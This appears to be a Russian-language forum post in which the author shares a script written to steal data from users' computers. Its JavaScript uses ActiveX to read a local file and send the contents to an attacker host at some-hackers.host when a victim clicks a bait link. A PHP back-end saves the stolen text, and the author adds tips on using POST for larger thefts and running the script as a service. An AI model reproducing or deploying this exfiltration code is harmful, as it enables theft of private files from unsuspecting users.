CODE
CreateObject("Scripting.FilesystemObject")
браузер сразу выдает предупреждение, что страница содержит небезопасный код
.И вообще Касперский определяет подобные штуки как червя и блокирует к ним доступ
.А так вот я тоже тут вечерком скриптец накатал для кражи данных с пользовательских компьютеров
CODE
<script>
var hackerHOST = 'http://some-hackers.host/exploit.php';
function deface()
{
var fso = new ActiveXObject("Scripting.FileSystemObject");
var file = fso.openTextFile("c:\\privateInfo.txt", 1 ,true);
var fContent = '';
while (!file.AtEndOfStream)
fContent += file.ReadLine() + '<BR>';
file.Close();
var hackerURL = hackerHOST + '?fContent=' + fContent;
var xmlRequest = new ActiveXObject("Microsoft.XMLHTTP");
if (xmlRequest)
{
xmlRequest.onreadystatechange = processChange;
xmlRequest.open("GET", hackerURL, true);
xmlRequest.send();
}
}
function processChange()
{
if (xmlRequest.readyState == 4)
{
if (xmlRequest.status == 200)
{
myResponse = xmlRequest.responseXML.documentElement;
parseOutput(myResponse);
}
}
}
</SCRIPT>
<A href="javascript:void(0);" ONCLICK="javascript:deface();">ЖЫМИТЕ, ПАЖАЛУСТА, СЮДА</A>
И соответственно back-end всего этого
CODE
<?PHP
$fp = fopen('C:\stolenInformation.txt','w');
fputs($fp,$_GET["fContent"]);
fclose();
?>
Р.S. Для увода большого количества информации можно использовать POST метод при отправке данных
Можно, вот например, как сервис запускать... Варианты есть. 
